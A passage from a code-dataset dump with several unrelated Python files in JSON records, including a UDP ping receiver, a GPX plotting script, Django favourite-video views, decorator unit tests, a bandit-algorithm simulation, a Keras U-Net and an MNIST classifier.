socket.SOCK_DGRAM)\r\n\r\nip = socket.gethostname()\r\nport = 8001\r\n\r\nsock.bind((ip, port))\r\nprint(\"Running on:\", ip, port)\r\n\r\nreceived_mesg = sock.recv(1024).decode('utf-8')\r\n\r\nif received_mesg == \"ping\":\r\n sock.sendto(str(\"PONG\").encode('utf-8'), (ip, 8000))\r\n print(\"Sending:\", \"PONG\")","sub_path":"Recieving_client.py","file_name":"Recieving_client.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"243205317","text":"import gpxpy\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nfrom matplotlib import cm\nimport time\n\n\ndef loadGPX(link_to_gpx):\n # type: (String) -> matplotlib.pyplot\n\n gpx_file = open(link_to_gpx)\n\n gpx = gpxpy.parse(gpx_file);\n longitudes = [];\n latitudes = [];\n timestamps = [];\n\n # Add data to above created arrays\n 
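    # gpxpy exposes a parsed file as a tracks -> segments -> points hierarchy,
    # so three nested loops flatten every trackpoint into the parallel lists
    # above. Matplotlib's date axis expects its own float format rather than a
    # datetime, hence the epoch2num(mktime(...)) conversion applied to each
    # timestamp below, e.g. (a sketch, assuming a point `pt` with gpxpy's
    # usual `time` attribute):
    #   num = md.epoch2num(time.mktime(pt.time.timetuple()))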
for gpx_track in gpx.tracks:\n for segment in gpx_track.segments:\n for point in segment.points:\n\n latitudes.append(point.latitude)\n longitudes.append(point.longitude)\n\n timestamp = point.time\n # Transform to Number from Epoch Timestring\n timestamps.append(md.epoch2num(time.mktime(timestamp.timetuple())))\n\n # Init figure and Axes\n fig = plt.figure()\n ax = Axes3D(fig)\n\n # Create Scatterplot with colormap\n plot = ax.scatter(latitudes, longitudes, timestamps, c=range(len(timestamps)), cmap=cm.winter)\n\n # Format the dates\n ax.zaxis_date()\n zfmt = md.DateFormatter(\"%H:%M\")\n ax.zaxis.set_major_formatter(zfmt)\n\n # Axis labels\n ax.set_zlabel('Time', rotation=90)\n ax.set_xlabel('Latitude')\n ax.set_ylabel('Longitude')\n\n # Add legend\n fig.colorbar(plot, label='Time passed', shrink=0.5)\n\n plt.savefig('time_space_cube.png')\n plt.show()\n\nloadGPX('/Users/nico/Desktop/ArcGIS-Data/track.gpx')","sub_path":"time_space_cube.py","file_name":"time_space_cube.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"194245631","text":"from django.shortcuts import render,HttpResponse,get_object_or_404\r\nfrom account.models import VsUsers\r\nfrom videos.models import VsVideos\r\nfrom .models import VsFavourite\r\nfrom django.http import HttpResponse, JsonResponse\r\n# Create your views here.\r\n\r\n\r\ndef Checkfavourite_videos_list(request,video_id):\r\n if video_id:\r\n get_video_ins = get_object_or_404(VsVideos,Videos_id=video_id)\r\n get_user_ins = get_object_or_404(VsUsers,user=request.user)\r\n if VsFavourite.objects.filter(Subscribe=get_video_ins.Created_By).filter(VsUser=get_user_ins).exists():\r\n status = \"1\"\r\n else:\r\n status = \"0\"\r\n return JsonResponse({\"status\":status})\r\n\r\ndef updatefavourite_videos_list(request,video_id):\r\n if video_id:\r\n status = \"0\"\r\n message = \"\"\r\n get_video_ins = get_object_or_404(VsVideos,Videos_id=video_id)\r\n get_user_ins = get_object_or_404(VsUsers,user=request.user)\r\n if VsFavourite.objects.filter(Subscribe=get_video_ins.Created_By).filter(VsUser=get_user_ins).exists():\r\n VsFavourite.objects.filter(Subscribe=get_video_ins.Created_By).filter(VsUser=get_user_ins).delete()\r\n status = \"1\"\r\n message = \"Video remove in your favourite list.\"\r\n else:\r\n add_data = VsFavourite(Subscribe=get_video_ins.Created_By,VsUser=get_user_ins,Video=get_video_ins)\r\n add_data.save()\r\n status = \"0\"\r\n message = \"Video add in your favourite list.\"\r\n return JsonResponse({\"status\":status,\"message\":message})","sub_path":"favourite_videos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"324452048","text":"import logging\nfrom six import StringIO\nfrom time import sleep\nfrom unittest import TestCase, skip\n\nfrom mock import patch\n\nfrom pyff.decorators import retry, deprecated, cached\n\n\nclass Logger():\n def __init__(self):\n self.messages = []\n\n def warn(self, message):\n self.messages.append((logging.WARNING, message))\n\n\nclass TestRetry(TestCase):\n\n def test_retry_nop(self):\n status = [False]\n _logger = Logger()\n\n @retry(None, delay=1, backoff=1, logger=_logger)\n def runs_ok():\n status[0] = True\n runs_ok()\n assert(status[0])\n assert(len(_logger.messages) == 0)\n\n def test_retry_fail(self):\n status = [False]\n _logger = Logger()\n @retry(ValueError, delay=1, backoff=1, 
logger=_logger)\n def fails():\n raise ValueError(\"nope\")\n\n try:\n fails()\n assert False\n except ValueError as ex:\n assert(len(_logger.messages) == 3)\n pass\n assert(not status[0])\n\n def test_retry_fail_stdout(self):\n status = [False]\n @retry(ValueError, delay=1, backoff=1, logger=None)\n def fails():\n raise ValueError(\"nope\")\n\n with patch('sys.stdout', new=StringIO()) as mock_stdout:\n try:\n fails()\n assert False\n except ValueError as ex:\n assert(len(mock_stdout.getvalue().split(\"\\n\")) == 4)\n pass\n assert(not status[0])\n\n\nclass TestDeprecated(TestCase):\n\n def test_deprecate(self):\n\n _logger = Logger()\n\n @deprecated(logger=_logger)\n def test():\n pass\n\n assert(len(_logger.messages) == 0)\n test()\n assert(len(_logger.messages) == 1)\n assert('Call to deprecated function' in _logger.messages[0][1])\n assert(_logger.messages[0][0] == logging.WARNING)\n\n def test_deprecate_stdout(self):\n\n @deprecated(logger=None)\n def old_stuff():\n pass\n\n with patch('sys.stdout', new=StringIO()) as mock_stdout:\n old_stuff()\n assert('Call to deprecated function' in mock_stdout.getvalue())\n\n\nclass TestCached(TestCase):\n\n def setUp(self):\n self.counter = 0\n\n @cached(ttl=2)\n def next_counter(self, info=\"nothing\"):\n self.counter += 1\n self.info = info\n return self.counter\n\n def test_cached_simple(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n assert (self.next_counter() == 1)\n assert (self.next_counter(info=\"another\") == 2)\n assert (self.counter == 2)\n\n def test_cached_clear(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n self.next_counter.clear()\n assert (self.counter == 1)\n assert (self.next_counter() == 2)\n\n def test_cached_timeout(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n print(\"sleeping for 5 seconds...\")\n sleep(5)\n assert (self.counter == 1)\n assert (self.next_counter() == 2)\n\n\nclass TestCachedTyped(TestCase):\n\n def setUp(self):\n self.counter = 0\n\n @cached(ttl=3, typed=True) # long enough time for the test to run ... 
we hope\n def next_counter(self, info=\"nothing\"):\n self.counter += 1\n self.info = info\n return self.counter\n\n @skip(\"fix later\")\n def test_cached_simple(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n assert (self.next_counter() == 1)\n assert (self.next_counter.hits() == 1)\n assert (self.next_counter.misses() == 1)\n assert (self.next_counter(info=\"another\") == 2)\n assert (self.counter == 2)\n self.next_counter.invalidate(info=\"another\")\n assert (self.next_counter(info=\"another\") == 3)\n\n def test_cached_clear(self):\n assert (self.counter == 0)\n assert (self.next_counter() == 1)\n self.next_counter.clear()\n assert (self.counter == 1)\n assert (self.next_counter() == 2)\n","sub_path":"src/pyff/test/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":4113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"304151900","text":"from tests.game_tests import GameTests\n\n\nclass A:\n @classmethod\n def create(cls):\n print(\"Creating type from: \" + str(cls))\n return A()\n\n def use_var(self):\n print(\"using local instance: \" + str(id(self)))\n\n\na1 = A.create()\na2 = A.create()\n\na1.use_var()\na2.use_var()\n\n\nGameTests.setUpClass()\n\nt1 = GameTests()\nt1.setUp()\nt1.test_can_create_empty_game()\n\nt2 = GameTests()\nt2.setUp()\nt2.test_cell_can_be_played()","sub_path":"10_Unit_testing/app/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"176518065","text":"import subprocess\nimport os\nimport random\n\nf = open('../Data/10/lsc','r')\n\ncharacter = []\nfor i in f:\n\tcharacter.append(i)\n\nfor i in range(len(character)):\n\tcharacter[i] = character[i].split(',')\n\tcharacter[i].pop(-1)\n\tfor j in range(len(character[i])):\n\t\tcharacter[i][j] = int(character[i][j])\n\tsigma = character[i][0]\n\tcharacter[i].pop(0)\n# print(character)\n# print(sigma)\n\nc = len(character[0])-2\nfor k in range(len(character)):\n\n\tc+=1\n\tif character[k][1] == -1:\n\t\tprint(\"{0},{1},-1\".format(sigma,c))\n\t\tcontinue\n\n\n\tmark = [0]*len(character[k])\n\tcycle_number = 1\n\tcycles = []\n\tdef add_cycle(ch,m,pos):\n\t\ttemp = 0\n\t\tcycles.append([])\n\t\tmark[pos] = 1\n\t\tcur = pos\n\t\twhile ch[cur]!= pos:\n\t\t\ttemp+=1\n\t\t\t# print(temp,len(character[k]),cur)\n\t\t\tcycles[-1].append(cur)\n\t\t\tmark[cur] = 1\n\t\t\tcur = ch[cur]\n\t\tcycles[-1].append(cur)\n\t\tmark[cur] = 1\n\n\tfor i in range(1,len(mark)):\n\t\tif mark[i] == 0:\n\t\t\tadd_cycle(character[k],mark,i)\n\n\tprint(\"{0},{1},{2}\".format(sigma,len(character[k])-1,len(cycles)))\n","sub_path":"Code/runscript.py","file_name":"runscript.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"200327136","text":"import numpy as np\nimport csv\nimport random\nimport time\nfrom joblib import Parallel, delayed\n\n\nfrom copy import deepcopy\n\nfrom lib.constants import DEFAULT_FREE_OBS_NUM\nfrom lib.BanditProblemInstance import BanditProblemInstance\n\nfrom lib.bandit.StaticGreedy import StaticGreedy\nfrom lib.bandit.DynamicEpsilonGreedy import DynamicEpsilonGreedy\nfrom lib.bandit.NonBayesianEpsilonGreedy import NonBayesianEpsilonGreedy\nfrom lib.bandit.DynamicGreedy import DynamicGreedy\nfrom lib.bandit.UCB import UCB1WithConstantOne, UCB1WithConstantT\nfrom lib.bandit.ThompsonSampling 
import ThompsonSampling\nfrom lib.bandit.ExploreThenExploit import ExploreThenExploit\nfrom simulate import getRealDistributionsFromPrior\n\nfrom scipy.stats import bernoulli, beta\n\n\nT = 2001\nN = 1000\nK = 10\nnumCores = 10\n\n'''\nCurrently, realizations are generated and used as follows:\nWe generate FREE_OBS + MAX_WS + T observations.\nThe first FREE_OBS observations are not used in the isolation sim (for now)\nThe next MAX_WS are reserved for the warm start. If a WS < MAX_WS is used then it simply takes WS realizations from this\nThe observations after FREE_OBS + MAX_WS are the realizations used in competition\n'''\n\n\n\nMAX_WARM_START_SIZE = 200 # the max warm start size\nCUR_WARM_START = 20\nnumObs = MAX_WARM_START_SIZE + T + DEFAULT_FREE_OBS_NUM\n\n\nDEFAULT_COMMON_PRIOR = [beta(1, 1) for k in xrange(K)]\n\n\ndef sim(alg, banditDistr, realizations, seed):\n seed = int(seed)\n np.random.seed(seed)\n\n warmStartRealizations = realizations[DEFAULT_FREE_OBS_NUM:CUR_WARM_START+DEFAULT_FREE_OBS_NUM]\n competitionRealizations = realizations[MAX_WARM_START_SIZE + DEFAULT_FREE_OBS_NUM:]\n totalRealizations = warmStartRealizations + competitionRealizations\n\n\n banditProblemInstance = BanditProblemInstance(K, banditDistr, totalRealizations)\n\n banditAlg = alg(banditProblemInstance, DEFAULT_COMMON_PRIOR)\n for t in xrange(T+CUR_WARM_START):\n banditAlg.executeStep(t)\n return (banditAlg.realizedRewardHistory, banditAlg.realizedCumulativeRewardHistory, banditAlg.meanRewardHistory, banditAlg.meanCumulativeRewardHistory, banditProblemInstance.getArmMeans(), banditProblemInstance.getComplexityMetric())\n\ndefault_mean = 0.5\nneedle_in_haystack = [bernoulli(default_mean) for i in xrange(K)]\n\nneedle_in_haystack_50_high = deepcopy(needle_in_haystack)\nneedle_in_haystack_50_high[int(K/2)] = bernoulli(default_mean + 0.2)\n\nheavy_tail_prior = beta(0.6, 0.6)\nheavy_tailed = [bernoulli(heavy_tail_prior.rvs()) for i in xrange(K)]\n\ndef get_needle_in_haystack(starting_mean):\n needle_in_haystack = [bernoulli(starting_mean) for i in xrange(K)]\n needle_in_haystack[int(K/2)] = bernoulli(starting_mean + 0.2)\n return needle_in_haystack\n\nALGS = [DynamicGreedy, ThompsonSampling, DynamicEpsilonGreedy]\nBANDIT_DISTR = {\n 'Heavy Tail': heavy_tail_prior,\n 'Uniform': None,\n 'Needle In Haystack': get_needle_in_haystack(0.5),\n '.5/.7 Random Draw': None\n}\n\n\nWORKING_DIRECTORY = ''\nWORKING_DIRECTORY = '/rigel/home/ga2449/bandits-rl-project/'\n# Algorithm, Arms, Prior, t, n, reward\n\nRESULTS_DIR = WORKING_DIRECTORY + 'results/preliminary_raw_results/'\n\n\nFILENAME = 'preliminary_plots_unified'\nrealizations_name = RESULTS_DIR + FILENAME + '_realizations.csv'\ndist_name = RESULTS_DIR + FILENAME + '_dist.csv'\n\nFIELDNAMES = ['Realized Complexity', 'n', 'True Mean Reputation', 'Realized Reputation', 'Algorithm', 'K', 'Distribution', 't', 'Instantaneous Realized Reward Mean', 'Instantaneous Mean Reward Mean', 'Arm Means']\nsimResults = {}\n\nwith open(RESULTS_DIR + FILENAME + '.csv', 'w') as csvfile:\n with open(realizations_name, 'w') as realiz:\n with open(dist_name, 'w') as dist:\n\n writer = csv.DictWriter(csvfile, fieldnames=FIELDNAMES)\n writer.writeheader()\n for (banditDistrName, banditDistr) in BANDIT_DISTR.iteritems():\n for a in xrange(len(ALGS)):\n simResults[ALGS[a]] = []\n realDistributions = {}\n realizations = {}\n\n dist_writer = csv.writer(dist)\n dist_writer.writerow(['Prior'] + [i for i in xrange(K)])\n\n realization_writer = csv.writer(realiz)\n 
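                    # Layout note: the dist file holds one row per (prior, run)
                    # with each arm's true mean, while the realizations file
                    # written next holds one row per (prior, step, run) with all
                    # K sampled rewards; its header, written below, is
                    # 'Prior', 't', 'n' followed by the K arm indices.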
realization_writer.writerow(['Prior', 't', 'n'] + [i for i in xrange(K)])\n\n for q in xrange(N):\n realDistributions[q] = getRealDistributionsFromPrior(banditDistrName, banditDistr, K)\n realizations[q] = [[realDistributions[q][j].rvs() for j in xrange(len(realDistributions[q]))] for k in xrange(numObs)]\n dist_writer.writerow([banditDistrName] + [realDistributions[q][j].mean() for j in xrange(len(realDistributions[q]))])\n realization_writer.writerows([[banditDistrName, k, q] + [z for z in realizations[q][k]] for k in xrange(numObs)])\n\n\n for a in xrange(len(ALGS)):\n alg = ALGS[a]\n simResults[alg] = Parallel(n_jobs=numCores)(delayed(sim)(alg, realDistributions[j], realizations[j], j+1) for j in xrange(N))\n for t in range(5, T+CUR_WARM_START, 5):\n for (alg, algResult) in simResults.iteritems():\n name = alg.__name__\n for j in xrange(len(algResult)):\n realized_reputation = np.mean(algResult[j][0][max(0,t-100):t])\n true_reputation = np.mean(algResult[j][2][max(0,t-100):t])\n instantaneous_realized = algResult[j][0][t]\n instantaneous_mean = algResult[j][2][t]\n res = {\n 'Algorithm': name,\n 'K': str(K),\n 'n': str(j),\n 'Distribution': banditDistrName,\n 't': str(t),\n 'Instantaneous Realized Reward Mean': instantaneous_realized,\n 'Instantaneous Mean Reward Mean': instantaneous_mean,\n 'Realized Reputation': realized_reputation,\n 'True Mean Reputation': true_reputation,\n 'Realized Complexity': str(algResult[j][5])\n }\n writer.writerow(res)\n\nprint('all done!')\n","sub_path":"simulation_code/isolation_sim.py","file_name":"isolation_sim.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"459734858","text":"# namedTuple -> ? 차이가 뭐지?\nimport math\nfrom collections import namedtuple, Counter, defaultdict\nfrom typing import NamedTuple\n\n# namedtuple 사용 방법\nstudent = namedtuple('Student', ('no', 'name', 'math', 'science', 'cs'))\nclass student2(NamedTuple):\n no: int\n name: str\n math: int\n science: int\n cs: int\n\nstudent = student2(10, 'you', 99, 99, 99)\nprint(student.name)\n\n# entropy - 불확실성의 정도, E() : 모든 경우에 대한 불확실성이다. 
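# (Numerically: for class probabilities p_1..p_n the code below computes
#  H = sum_i -p_i * log2(p_i); a fair coin, p = [0.5, 0.5], gives
#  -0.5*log2(0.5) - 0.5*log2(0.5) = 1.0 bit.)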
즉, 각 사건에 대한 불확실성의 합이다.\n# partitioning 별 entropy 측정\n# defaultdict test\nd = defaultdict(lambda: 0)\nprint(d)\n\n\ndef partition_by(dataset, attr_name):\n partitions = defaultdict(list) # dict 기본값 만듬\n for sample in dataset: # dataset 에서 sample 1개 꺼냄\n key = getattr(sample, attr_name)\n partitions[key].append(sample)\n return partitions\n\n\ndef class_probabilities(labels): # class 들의 확률을 구해주는 함수\n total_count = len(labels) # 전체 갯수\n counts = Counter(labels) # collection 의 Counter\n print(counts)\n probabilities = [] # 집어넣을 확률 정하기\n for count in counts.values(): # value 만 빼냈다\n p = count / total_count # 확률을 구해주었다.\n probabilities.append() # 각 value 의 확률 리스트에 더함\n return probabilities\n\n\ndef uncertainty(p):\n return -p * math.log(p, 2)\n\n\ndef entropy(class_probabilities):\n ent = 0\n for p in class_probabilities:\n if p != 0:\n ent += uncertainty(p)\n return ent\n\n\ndef partition_entropy_by(dataset, by_partition, by_entropy):\n partitions = partition_by(dataset, by_partition) # partitioning\n labels = []\n for partition in partitions.values():\n values = []\n for sample in partition:\n values.append(getattr(sample, by_entropy))\n labels.append(values)\n print(labels)\n total_count = sum(len(label) for label in labels)\n ent = 0\n for label in labels:\n cls_prob = class_probabilities(label)\n part_ent = entropy(cls_prob)\n ent += part_ent * len(label) / total_count\n return ent\n\n\ndef user_input():\n while True:\n try:\n try:\n n = int(input('1, 2, 3 input your number'))\n except ValueError:\n raise ValueError('no string')\n if n in (1, 2, 3):\n return n\n else:\n raise ValueError('no string')\n except ValueError as e:\n print(e.args)\n\nuser = user_input()\nprint('입력값 =', user)\n\n\n\n\n\n\n","sub_path":"scratch15/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615762019","text":"## Script (Python) \"guard_edit_sample\"\n##bind container=container\n##bind context=context\n##bind namespace=\n##bind script=script\n##bind subpath=traverse_subpath\n##parameters=\n##title=\n##\n\nwf_tool = context.portal_workflow\n\n# Can't edit the sample if it's cancelled or any analysis has been verified\nif wf_tool.getInfoFor(context, 'cancellation_state') == \"cancelled\":\n return False\nelse:\n ars = context.getAnalysisRequests()\n for ar in ars:\n for a in ar.getAnalyses():\n if wf_tool.getInfoFor(a.getObject(), 'review_state') in ('verified', 'published'):\n return False\n\nreturn True\n\n","sub_path":"bika/lims/skins/bika/guard_edit_sample.py","file_name":"guard_edit_sample.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"241859807","text":"from keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.optimizers import *\r\nfrom keras import backend as K\r\nimport tensorflow as tf\r\n\r\ndef unet(pretrained_weights=None, input_size=(512, 512, 3), num_class=2):\r\n\t\r\n\r\n\tdef iou(y_true, y_pred, label):\r\n\t\t\"\"\"\r\n\t\tReturn the Intersection over Union (IoU) for a given label.\r\n\t\tArgs:\r\n\t\t\ty_true: the expected y values as a one-hot\r\n\t\t\ty_pred: the predicted y values as a one-hot or softmax output\r\n\t\t\tlabel: the label to return the IoU for\r\n\t\tReturns:\r\n\t\t\tthe IoU for the given label\r\n\t\t\"\"\"\r\n\t\t# extract the label values using the argmax operator then\r\n\t\t# calculate equality of the predictions and truths to 
the label\r\n\t\ty_true = K.cast(K.equal(K.argmax(y_true), label), K.floatx())\r\n\t\ty_pred = K.cast(K.equal(K.argmax(y_pred), label), K.floatx())\r\n\t\t# calculate the |intersection| (AND) of the labels\r\n\t\tintersection = K.sum(y_true * y_pred)\r\n\t\t# calculate the |union| (OR) of the labels\r\n\t\tunion = K.sum(y_true) + K.sum(y_pred) - intersection\r\n\t\t# avoid divide by zero - if the union is zero, return 1\r\n\t\t# otherwise, return the intersection over union\r\n\t\treturn K.switch(K.equal(union, 0), 1.0, intersection / union)\r\n\r\n\tdef mean_iou(y_true, y_pred):\r\n\t\t\"\"\"\r\n\t\tReturn the Intersection over Union (IoU) score.\r\n\t\tArgs:\r\n\t\t\ty_true: the expected y values as a one-hot\r\n\t\t\ty_pred: the predicted y values as a one-hot or softmax output\r\n\t\tReturns:\r\n\t\t\tthe scalar IoU value (mean over all labels)\r\n\t\t\"\"\"\r\n\t\t# get number of labels to calculate IoU for\r\n\t\tnum_labels = K.int_shape(y_pred)[-1]\r\n\t\t# initialize a variable to store total IoU in\r\n\t\ttotal_iou = K.variable(0)\r\n\t\t# iterate over labels to calculate IoU for\r\n\t\tfor label in range(num_labels):\r\n\t\t\ttotal_iou = total_iou + iou(y_true, y_pred, label)\r\n\t\t# divide total IoU by number of labels to get mean IoU\r\n\t\treturn total_iou / num_labels\r\n\t\r\n\tdef iou_loss_score(true, pred): # this can be used as a loss if you make it negative\r\n\t\t# https://www.kaggle.com/c/tgs-salt-identification-challenge/discussion/63044\r\n\t\tintersection = true * pred\r\n\t\tnotTrue = 1 - true\r\n\t\tunion = true + (notTrue * pred)\r\n\r\n\t\treturn -(K.sum(intersection, axis=-1) + K.epsilon()) / (K.sum(union, axis=-1) + K.epsilon())\r\n\t\r\n\tinputs = Input(input_size)\r\n\tredux = 4\r\n\t\r\n\tconv1 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)\r\n\tconv1 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)\r\n\tpool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\r\n\t\r\n\tconv2 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\r\n\tconv2 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)\r\n\tpool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\r\n\t\r\n\tconv3 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\r\n\tconv3 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)\r\n\tpool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\r\n\t\r\n\tconv4 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)\r\n\tconv4 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)\r\n\tdrop4 = Dropout(0.5)(conv4)\r\n\tpool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\r\n\r\n\t# conv5 = Conv2D(1024//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\r\n\t# conv5 = Conv2D(1024//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\r\n\t# drop5 = Dropout(0.5)(conv5)\r\n\r\n\tconv5 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\r\n\tconv5 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\r\n\tdrop5 = Dropout(0.5)(conv5)\r\n\r\n\tup6 = Conv2D(512//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 
2))(drop5)\r\n\t)\r\n\r\n\tmerge6 = concatenate([drop4, up6], axis=3)\r\n\tconv6 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)\r\n\tconv6 = Conv2D(512//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)\r\n\r\n\tup7 = Conv2D(256//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 2))(conv6)\r\n\t)\r\n\tmerge7 = concatenate([conv3, up7], axis=3)\r\n\tconv7 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)\r\n\tconv7 = Conv2D(256//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)\r\n\r\n\tup8 = Conv2D(128//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 2))(conv7)\r\n\t)\r\n\tmerge8 = concatenate([conv2, up8], axis=3)\r\n\tconv8 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)\r\n\tconv8 = Conv2D(128//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)\r\n\r\n\tup9 = Conv2D(64//redux, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\r\n\t\tUpSampling2D(size=(2, 2))(conv8)\r\n\t)\r\n\r\n\tmerge9 = concatenate([conv1, up9], axis=3)\r\n\tconv9 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)\r\n\tconv9 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n\tconv9 = Conv2D(64//redux, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\r\n\t\r\n\tif num_class == 2:\r\n\t\tconv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\r\n\t\tloss_function = 'binary_crossentropy'\r\n\telse:\r\n\t\tconv10 = Conv2D(num_class, 1, activation='softmax')(conv9)\r\n\t\tloss_function = 'categorical_crossentropy'\r\n\t\t# https://stackoverflow.com/questions/45799474/keras-model-evaluate-vs-model-predict-accuracy-difference-in-multi-class-nlp-ta/45834857#45834857\r\n\t\t# https://stackoverflow.com/questions/42081257/keras-binary-crossentropy-vs-categorical-crossentropy-performance\r\n\t\r\n\tmodel = Model(input=inputs, output=conv10)\r\n\t# model.compile(optimizer=Adam(lr=1e-4), loss=loss_function, metrics=[\"accuracy\"])\r\n\t# model.compile(optimizer=Adam(lr=1e-4), loss=iou_loss_score, metrics=[\"accuracy\"]) # no funciona\r\n\t# model.compile(optimizer=SGD(lr=1e-4, nesterov=True), loss=loss_function, metrics=[\"accuracy\"])\r\n\tmodel.compile(optimizer=Adadelta(lr=1.0, decay=0.05), loss=loss_function, metrics=[\"accuracy\"])\r\n\t# model.compile(optimizer=RMSprop(lr=1e-4, decay=0.995), loss=loss_function, metrics=[\"accuracy\"])\r\n\r\n\t# https://www.dlology.com/blog/quick-notes-on-how-to-choose-optimizer-in-keras/\r\n\t\r\n\tmodel.summary()\r\n\r\n\tif (pretrained_weights):\r\n\t\tmodel.load_weights(pretrained_weights)\r\n\r\n\treturn model\r\n","sub_path":"model_v2.py","file_name":"model_v2.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"312095166","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"一个简单的MNIST分类器,一层线性层加softmax实现\n\n@author: winton \n@time: 2017-10-25 11:22 \n\"\"\"\nimport os\nimport sys\n\nimport gflags\n\nimport photinia\nimport tensorflow as tf\nimport numpy as np\n\nfrom examples import mnist\n\n\nclass Model(photinia.Model):\n \"\"\"模型定义\n \"\"\"\n\n def __init__(self,\n name,\n 
session,\n input_size,\n num_classes):\n \"\"\"模型初始化\n\n :param name: 模型名\n :param session: 使用的tensorflow会话\n :param input_size: 输入维度\n :param num_classes: 类别数\n \"\"\"\n self._input_size = input_size\n self._num_classes = num_classes\n super().__init__(name, session)\n\n def _build(self):\n # 网络模块定义:线性层 --- build\n self._lin = photinia.Linear('LINEAR', self._input_size, self._num_classes)\n # 输入定义\n x = tf.placeholder(dtype=photinia.dtype, shape=[None, self._input_size])\n y_ = tf.placeholder(dtype=photinia.dtype, shape=[None, self._num_classes])\n # 网络结构定义 --- setup\n y = self._lin.setup(x)\n # 损失函数定义, softmax交叉熵函数\n loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n # accuracy计算\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, photinia.dtype))\n # 设置训练和预测的slot\n self._add_slot(\n 'train',\n outputs=loss,\n inputs=(x, y_),\n updates=tf.train.GradientDescentOptimizer(0.5).minimize(loss)\n )\n self._add_slot(\n 'predict',\n outputs=accuracy,\n inputs=(x, y_)\n )\n\n\nclass DataSource(photinia.DataSource):\n \"\"\"数据源定义\n\n 需要把mnist.py返回的图形矩阵(28x28)拉长成一维向量(784)\n \"\"\"\n def __init__(self, directory):\n self._data = mnist.Data(directory)\n\n @property\n def test_images(self):\n size = self._data.test_images.shape[0]\n return np.reshape(self._data.test_images, newshape=(size, -1))\n\n @property\n def test_labels(self):\n return self._data.test_labels\n\n def next_batch(self, size=0):\n images_batch, labels_batch = self._data.next_batch(size)\n return np.reshape(images_batch, newshape=(size, -1)), labels_batch\n\n\ndef main(flags):\n # 创建数据源对象\n ds = DataSource(flags.directory)\n # tensorflow 配置\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n # 开始session\n with tf.Session(config=config) as session:\n # 创建模型对象\n model = Model('Model', session, flags.input_size, flags.num_classes)\n # 获取slot\n train = 